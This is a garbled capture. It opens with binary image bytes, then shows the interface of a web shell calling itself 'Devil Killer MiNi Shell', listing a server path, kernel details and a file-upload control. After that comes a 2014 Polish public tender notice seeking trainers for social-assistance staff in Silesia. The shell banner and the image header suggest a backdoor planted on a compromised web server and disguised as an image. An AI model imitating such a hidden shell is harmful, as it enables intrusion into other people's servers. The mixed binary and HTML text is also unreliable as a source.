JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140122/24572-N-2014.html

<p class="kh_header"><b>Katowice: ROPS.PSO.3321.2.2014 - Wybór osób prowadzących usługi szkoleniowe w ramach projektu systemowego Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego realizowanego przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego</b><br>
<b>Numer ogłoszenia: 24572 - 2014; data zamieszczenia: 22.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego , ul Modelarska 10, 40-142 Katowice, woj. śląskie, tel. 32 730 68 68, faks 32 730 68 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROPS.PSO.3321.2.2014 - Wybór osób prowadzących usługi szkoleniowe w ramach projektu systemowego Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego realizowanego przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - Trening zastępowania agresji - szkolenie podstawowe i szkolenie trenerskie wraz z opieką superwizyjną

1.	Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zrealizowaniu ścieżki szkoleniowej pod nazwą Trening zastępowania agresji - szkolenie podstawowe  dla dwóch grup szkoleniowych (po około 20 uczestników w każdej grupie) oraz szkolenia Trening zastępowania agresji - szkolenie trenerskie z opieką superwizyjną  dla 1 grupy szkoleniowej (około 20 osób) wyłonionej (na podstawie testu/rozmowy                        i frekwencji) spośród uczestników szkolenia Trening zastępowania agresji - szkolenie podstawowe.
2.	Całość usługi obejmuje jeden  czterodniowy moduł wyjazdowy   (32 godziny dydaktyczne/grupę) - szkolenie podstawowe - realizowany dla dwóch grup, oraz jeden pięciodniowy moduł szkoleniowy (40 godzin dydaktycznych) - szkolenie trenerskie - realizowany dla jednej, wyłonionej spośród uczestników kursu podstawowego, grupy szkoleniowej. Zajęcia będą się odbywać w dni robocze.
3.	Zamawiający podaje minimalny zakres tematyczny szkoleń. Wykonawca odpowiedzialny jest za skonstruowanie, z uwzględnieniem podanych zagadnień, pełnego programu zajęć. 
4.	Zamawiający wymaga, aby każde ze szkoleń/modułów dla każdej z grup było przeprowadzone  równocześnie przez dwóch trenerów.


Część II - Tworzenie i realizowanie indywidualnych planów postępowania wspierająco-aktywizującego dla podopiecznych ŚDS

1.	Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zrealizowaniu szkolenia pod nazwą Tworzenie i realizowanie indywidualnych planów postępowania wspierająco-aktywizującego dla podopiecznych ŚDS dla dwóch grup szkoleniowych. Liczba uczestników - około 20 osób w każdej grupie.
2.	Trzydniowe szkolenie (24 godziny dydaktyczne) realizowane będzie w trybie wyjazdowym, dla każdej                    z dwóch grup szkoleniowych.
3.	Zajęcia będą się odbywać w dni robocze.
4.	Zamawiający podaje minimalny zakres tematyczny szkolenia. Wykonawca odpowiedzialny jest za skonstruowanie, z uwzględnieniem podanych zagadnień, pełnego programu zajęć.

Część III - Repetytorium działalności CIS i KIS - aspekty prawne, finansowe                                                                                                                                                             i organizacyjne

1.	Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zrealizowaniu szkolenia Repetytorium działalności CIS i KIS - aspekty prawne, finansowe i organizacyjne dla 2 grup szkoleniowych. Liczba uczestników - około 20 osób w każdej grupie.
2.	Trzydniowe szkolenie (24 godziny dydaktyczne) realizowane będzie w trybie wyjazdowym, dla każdej                  z dwóch grup szkoleniowych.
3.	Zajęcia będą się odbywać w dni robocze.
4.	Zamawiający podaje minimalny zakres tematyczny szkolenia. Wykonawca odpowiedzialny jest za skonstruowanie, z uwzględnieniem podanych zagadnień, pełnego programu zajęć.

Część IV - Innowacyjne metody aktywizacji klientów pomocy społecznej

1.	Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zrealizowaniu szkolenia pod nazwą Innowacyjne metody aktywizacji klientów pomocy społecznej.
2.	Czterodniowe szkolenie (32 godziny dydaktyczne), realizowane będzie w trybie wyjazdowym, dla każdej             z dwóch grup szkoleniowych liczących po ok. 20 osób każda.
3.	Zajęcia będą się odbywać w dni robocze.
4.	Zamawiający podaje minimalny zakres tematyczny szkolenia. Wykonawca odpowiedzialny jest za skonstruowanie, z uwzględnieniem podanych zagadnień, pełnego programu zajęć..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia na podstawie załączonego do oferty wykazu głównych usług, stanowiącego załącznik nr 6 do SIWZ.

dla Części I - Trening zastępowania agresji - szkolenie podstawowe i szkolenie trenerskie
Spełnia oznacza, że wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie 4 usługi polegające na świadczeniu usługi szkoleniowej - trening zastępowania agresji, dającej uczestnikom uprawnienia do certyfikacji trenerskiej, o wartości nie mniejszej niż 10 000,00 zł każda. 

dla Części II - Tworzenie i realizowanie indywidualnych planów postępowania wspierająco-aktywizującego dla podopiecznych ŚDS
Spełnia oznacza, że wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert,                   a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie 5 usług, polegających na świadczeniu usług szkoleniowych dla pracowników i wolontariuszy kadr pomocy                  i integracji społecznej z zakresu pracy z podopiecznymi ŚDS i/lub osobami chorymi psychicznie i/lub             z upośledzeniem umysłowym o wartości nie mniejszej niż  3 000 zł każda.

dla Części III - Repetytorium działalności CIS i KIS - aspekty prawne, finansowe                                                                                                                                                             i organizacyjne
Spełnia oznacza, że wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert,                   a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie 5 usług, polegających na świadczeniu usług szkoleniowych z zakresu ekonomii społecznej i/lub zakładania                 i prowadzenia CIS i KIS dla kadr pomocy i integracji społecznej o wartości nie mniejszej niż 3 000,00 zł każda.

dla Części IV - Innowacyjne metody aktywizacji klientów pomocy społecznej
Spełnia oznacza, że wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert,                   a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie 5 usług, polegających na świadczeniu usług szkoleniowych z obszaru metod pracy z klientem pomocy społecznej  dla kadr pomocy i integracji społecznej o wartości nie mniejszej niż 3 000,00 zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia na podstawie załączonego do oferty dokumentu pn.: Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, stanowiącego załącznik nr 7 do SIWZ.


dla Części I - Trening zastępowania agresji - szkolenie podstawowe i szkolenie trenerskie
-	minimalne wykształcenie na poziomie wyższym magisterskim z zakresu nauk humanistycznych;
-	certyfikat trenera treningu zastępowania agresji;
-	przeprowadzone minimum 100 godzin dydaktycznych zajęć z obszaru podstawowego treningu zastępowania agresji oraz 100 godzin dydaktycznych zajęć z obszaru treningu zastępowania agresji dla przyszłych trenerów metody;
-	minimum 3 lata doświadczenia w pracy w placówkach opiekuńczo - wychowawczych i/lub jednostkach organizacyjnych pomocy społecznej i/lub organizacjach pozarządowych pracujących              z dziećmi/młodzieżą/dorosłymi z dysfunkcjami lub zagrożonymi wykluczeniem społecznym i/lub placówkach resocjalizacyjnych i/lub poradniach/instytutach pedagogicznych i/lub psychologicznych.


dla Części II - Tworzenie i realizowanie indywidualnych planów postępowania wspierająco-aktywizującego dla podopiecznych ŚDS
-	minimalne wykształcenie na poziomie wyższym z zakresu nauk humanistycznych i/lub medycznych,
-	minimum 3 lata doświadczenia w pracy w instytucjach  i/lub organizacjach zajmujących się pracą             z osobami z zaburzeniami psychicznymi i/lub przewlekle psychicznie chorymi i/lub                                 z upośledzeniem umysłowym,
-	przeprowadzone minimum 100 godzin dydaktycznych zajęć z zakresu pracy z osobami                              z zaburzeniami psychicznymi, przewlekle psychicznie chorymi i/lub osobami z upośledzeniem umysłowym. 

dla Części III - Repetytorium działalności CIS i KIS - aspekty prawne, finansowe i organizacyjne
minimalne wykształcenie na poziomie wyższym z zakresu nauk humanistycznych,
minimum 3 letnie doświadczenie w pracy w jednostkach organizacyjnych pomocy społecznej lub organizacjach pozarządowych działających w obszarze pomocy i integracji społecznej,
minimum 100 godzin dydaktycznych przeprowadzonych szkoleń dla kadr pomocy i integracji społecznej z zakresu usług reintegracji społecznej i zawodowej i/lub współpracy międzyinstytucjonalnej w obszarze przeciwdziałania wykluczeniu zawodowemu                        i społecznemu i/lub zakładania i prowadzenia CIS i KIS.

dla Części IV - Innowacyjne metody aktywizacji klientów pomocy społecznej
-	minimalne wykształcenie na poziomie wyższym magisterskim z zakresu nauk społecznych,
-	minimum 150 godzin dydaktycznych zajęć dla Kadr pomocy i integracji społecznej z obszaru metod aktywizacji społecznej i zawodowej klientów pomocy społecznej,
-	minimum 3 lata doświadczenia w pracy w instytucjach i/lub organizacjach pomocy i integracji społecznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie zgodne w treści z Załącznikiem nr 8 do SIWZ, że osoby, które będą uczestniczyć                    w wykonaniu zamówienia spełniają wszystkie wymagania Zamawiającego przedstawione w opisie przedmiotu zamówienia do Specyfikacji Istotnych Warunków Zamówienia</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.	W skład oferty powinny wchodzić:
a)	Podpisany i wypełniony Formularz ofertowy, załącznik nr 1 do SIWZ. Oferta musi zawierać oświadczenie Wykonawcy, wskazujące te części zamówienia, których wykonanie powierzy podwykonawcom,
b)	Podpisany i wypełniony Formularz cenowy, załącznik nr 2 do SIWZ,
c)	Podpisany i wypełniony Program zajęć, załącznik nr 9 do SIWZ ,
d)	Wszystkie wymagane przez Zamawiającego oświadczenia i dokumenty wskazane w rozdziale VI niniejszej SIWZ,
e)	Pełnomocnictwo.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany umowy mogą nastąpić w następujących przypadkach: 
a)	Zaistnienia omyłki pisarskiej,
b)	Zmiany danych teleadresowych,
c)	Zaistnienia siły wyższej (np. powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy                     w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
2.	Dopuszcza się możliwość zmiany terminów szkoleń składających się na przedmiot umowy z następujących przyczyn:
a)	jeżeli w wyniku przeprowadzonej rekrutacji do udziału w szkoleniu nie zostanie zakwalifikowana przynajmniej 60%  grupa uczestników spełniających kryteria stawiane na etapie procesu rekrutacji,
b)	zaistnienie siły wyższej (w szczególności: choroba trenera, powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
3.	Zamawiający może zwrócić się do Wykonawcy o zmianę osoby (osób) prowadzącej szkolenie jeśli                     w wyniku przeprowadzonej przez Zamawiającego ankiety ewaluacyjnej uzyska ona ocenę poniżej 3,75                               pkt. w pięciostopniowej skali ocen. Zaproponowana osoba musi posiadać kwalifikacje nie mniejsze niż określone w Rozdziale V pkt. 1 lit. d SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops-katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego, ul. Modelarska 10, 40-142 Katowice pokój nr 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2014 godzina 10:00, miejsce: Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego, ul. Modelarska 10, 40-142 Katowice kancelaria, pokój nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, w ramach projektu pod nazwą: Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Trening zastępowania agresji - szkolenie podstawowe i szkolenie trenerskie wraz z opieką superwizyjną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zrealizowaniu ścieżki szkoleniowej pod nazwą Trening zastępowania agresji - szkolenie podstawowe  dla dwóch grup szkoleniowych (po około 20 uczestników w każdej grupie) oraz szkolenia Trening zastępowania agresji - szkolenie trenerskie z opieką superwizyjną  dla 1 grupy szkoleniowej (około 20 osób) wyłonionej (na podstawie testu/rozmowy                        i frekwencji) spośród uczestników szkolenia Trening zastępowania agresji - szkolenie podstawowe.
2.	Całość usługi obejmuje jeden  czterodniowy moduł wyjazdowy   (32 godziny dydaktyczne/grupę) - szkolenie podstawowe - realizowany dla dwóch grup, oraz jeden pięciodniowy moduł szkoleniowy (40 godzin dydaktycznych) - szkolenie trenerskie - realizowany dla jednej, wyłonionej spośród uczestników kursu podstawowego, grupy szkoleniowej. Zajęcia będą się odbywać w dni robocze.
3.	Zamawiający podaje minimalny zakres tematyczny szkoleń. Wykonawca odpowiedzialny jest za skonstruowanie, z uwzględnieniem podanych zagadnień, pełnego programu zajęć. 
4.	Zamawiający wymaga, aby każde ze szkoleń/modułów dla każdej z grup było przeprowadzone  równocześnie przez dwóch trenerów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Tworzenie i realizowanie indywidualnych planów postępowania wspierająco-aktywizującego dla podopiecznych ŚDS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zrealizowaniu szkolenia pod nazwą Tworzenie i realizowanie indywidualnych planów postępowania wspierająco-aktywizującego dla podopiecznych ŚDS dla dwóch grup szkoleniowych. Liczba uczestników - około 20 osób w każdej grupie.
2.	Trzydniowe szkolenie (24 godziny dydaktyczne) realizowane będzie w trybie wyjazdowym, dla każdej                    z dwóch grup szkoleniowych.
3.	Zajęcia będą się odbywać w dni robocze.
4.	Zamawiający podaje minimalny zakres tematyczny szkolenia. Wykonawca odpowiedzialny jest za skonstruowanie, z uwzględnieniem podanych zagadnień, pełnego programu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - Repetytorium działalności CIS i KIS - aspekty prawne, finansowe                                                                                                                                 i organizacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa szkoleniowa polegająca na zrealizowaniu szkolenia Repetytorium działalności CIS i KIS - aspekty prawne, finansowe i organizacyjne dla 2 grup szkoleniowych. Liczba uczestników - około 20 osób w każdej grupie.
2.	Trzydniowe szkolenie (24 godziny dydaktyczne) realizowane będzie w trybie wyjazdowym, dla każdej                  z dwóch grup szkoleniowych.
3.	Zajęcia będą się odbywać w dni robocze.
4.	Zamawiający podaje minimalny zakres tematyczny szkolenia. Wykonawca odpowiedzialny jest za skonstruowanie, z uwzględnieniem podanych zagadnień, pełnego programu zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
